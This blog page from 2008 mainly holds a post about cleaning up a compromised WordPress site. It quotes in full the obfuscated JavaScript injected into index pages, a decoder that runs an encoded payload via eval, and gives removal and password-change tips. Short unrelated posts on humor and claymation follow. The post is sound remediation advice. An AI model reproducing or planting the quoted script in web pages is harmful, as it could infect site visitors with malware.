Nov
25
2008
0

Why change your password?

Change your password regularly!

A panicky customer call came in the other day. It seems they recently implemented a Wordpress blog and now one of their customers is asking them how come the website has malware.

Change your password regularly!

I had them send me ftp login information so I could look around. Sure enough, when I edited an index.* in any directory, there was a javascript entry sitting in the head tag with what appears to be garbage but ain’t! After taking a look around his files & directories,  littered with malnamed directories, I asked them how many people had access to the hosting account and when was the last time they changed their password. They didn’t remember doing that before. I said “Oh.”

Change your password regularly!

I use Chrome. It’s fast, it works. When I visit the site, Chrome says “don’t visit this site it’s associated with 7speed.info and that’s known to have malware.” Turns out, 7speed.info isn’t registered anymore. But that’s beside the point. Here’s what it looked like:

Change your password regularly!

If this post comes up in search results for 7speed.info and you’re looking for help cuz your site is labeled, change your password, delete the:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,15,60,5,50,47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KDgOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

entry from the index.* page for every domain on that host. The function name and code is different on each page. but it’s not readable; obviously obfuscated. If it’s not in the index.* files, use a Grep tool and search for “JavaScript>function”. Be sure to also remove any directories you don’t recognize (malnamed) from everywhere on the disk.

Change your password regularly!

If you need help after this, call me.

Did I mention, Change your password, regularly?

My Best,
Scott
Written by scott in: Malware, Tips, hosting | Tags: , , ,
Nov
12
2008
0

Next Generation Mac OS X and Windows 7 Comparison

There are some days that an article from The Onion is JUST the thing:

Onion Comparison

Enjoy,

RossB

Written by rossb in: Desktop, General, Humor, Mac, User Experience |
Nov
11
2008
0

Elegant Claymation

Check out this animation of an actual 1910 chess game.

One of the most elegant claymations I have seen.

Elegant Claymation

Written by deborah in: Multimedia |

Powered by WordPress | Aeros Theme | TheBuckmaker.com WordPress Themes